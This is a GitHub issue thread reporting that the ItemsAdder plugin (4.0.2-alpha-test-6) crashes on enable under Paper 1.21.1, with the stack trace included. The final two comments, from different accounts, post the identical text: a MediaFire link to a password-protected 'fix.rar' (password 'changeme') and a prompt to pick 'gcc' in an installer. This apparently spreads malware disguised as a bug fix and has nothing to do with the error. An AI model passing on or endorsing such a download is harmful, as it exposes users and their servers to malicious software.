### ISSUE TITLE
Itemsadder wont load with latest 1.21.1 paperspigot

### ISSUE THREAD

**Issue by thewickening** [PluginBugs/Issues-ItemsAdder#3923]
### Terms

- [X] I'm using the very latest version of ItemsAdder and its dependencies.
- [X] I am sure this is a bug and it is not caused by a misconfiguration or by another plugin.
- [X] I've looked for already existing issues on the [Issue Tracker](https://github.com/PluginBugs/Issues-ItemsAdder/issues) and haven't found any.
- [X] I already searched on the [plugin wiki](https://itemsadder.devs.beer/) to know if a solution is already known.
- [X] I already searched on the [forums](https://forum.devs.beer/) to check if anyone already has a solution for this.
- [X] I tested this with just ItemsAdder and its dependencies and with a vanilla client of the same version as the Server.

### What happened?

Updating to the latest version of lonelibs and itemsadder for 1.21.1 does not work.

### Steps to reproduce the issue

download latest version and start server

### Server version

Paper(52) 1.21.1-R0.1-SNAPSHOT

### ItemsAdder Version

4.0.2-alpha-test-6

### ProtocolLib Version

version 5.2.0 build#726

### LoneLibs Version

1.0.57

### Full Server Log

https://mclo.gs/fWZaEEu

### Error (optional)

```shell
[15:00:23 INFO]: [ItemsAdder] Enabling ItemsAdder v4.0.2-alpha-test-6
[15:00:24 INFO]: [ItemsAdder] 
  ___  ___        __        __   __   ___  __      ItemsAdder 4.0.2-alpha-test-6
|  |  |__   |\/| /__`  /\  |  \ |  \ |__  |__)     LoneLibs 1.0.57
|  |  |___  |  | .__/ /--\ |__/ |__/ |___ |  \     Paper 1.21.1-52-e08e667 (MC: 1.21.1)
                                               
[15:00:24 WARN]: [ItemsAdder]  
[15:00:24 WARN]: [ItemsAdder] This is a test version of ItemsAdder v4 for Minecraft 1.20.6 and 1.21.
[15:00:24 WARN]: [ItemsAdder] Please make backups before using this version.
[15:00:24 WARN]: [ItemsAdder] Use this only on a test server.
[15:00:24 WARN]: [ItemsAdder] I am not responsible for any damage done to your server.
[15:00:24 WARN]: [ItemsAdder]  
[15:00:24 INFO]: [ItemsAdder] Registered Citizens NPC Trait: customentity
[15:00:24 ERROR]: [ItemsAdder] Failed to find nms implementation for: interface ia.m.iV
[15:00:24 ERROR]: Error occurred while enabling ItemsAdder v4.0.2-alpha-test-6 (Is it up to date?)
java.lang.RuntimeException: null
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iH.a(SourceFile:151) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iH.a(SourceFile:49) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iH.l(SourceFile:40) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iS.<init>(SourceFile:42) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iS.jJ(SourceFile:66) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.iS.jI(SourceFile:60) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.cD.<init>(SourceFile:53) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.cD.fn(SourceFile:44) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.t(SourceFile:476) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.a(SourceFile:500) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.<init>(SourceFile:277) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/ia.m.G.a(SourceFile:297) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at ItemsAdder_4.0.2-alpha-test-6.jar/dev.lone.itemsadder.Main.onEnable(SourceFile:387) ~[ItemsAdder_4.0.2-alpha-test-6.jar:?]
        at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:288) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:202) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:109) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:520) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at org.bukkit.craftbukkit.CraftServer.enablePlugin(CraftServer.java:640) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at org.bukkit.craftbukkit.CraftServer.enablePlugins(CraftServer.java:589) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:754) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:516) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:329) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1215) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:330) ~[paper-1.21.1.jar:1.21.1-52-e08e667]
        at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]
[15:00:24 INFO]: [ItemsAdder] Disabling ItemsAdder v4.0.2-alpha-test-6
```

**Comment by thewickening** [comment]
Someone posted the same thing right before me as I was submitting this.

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
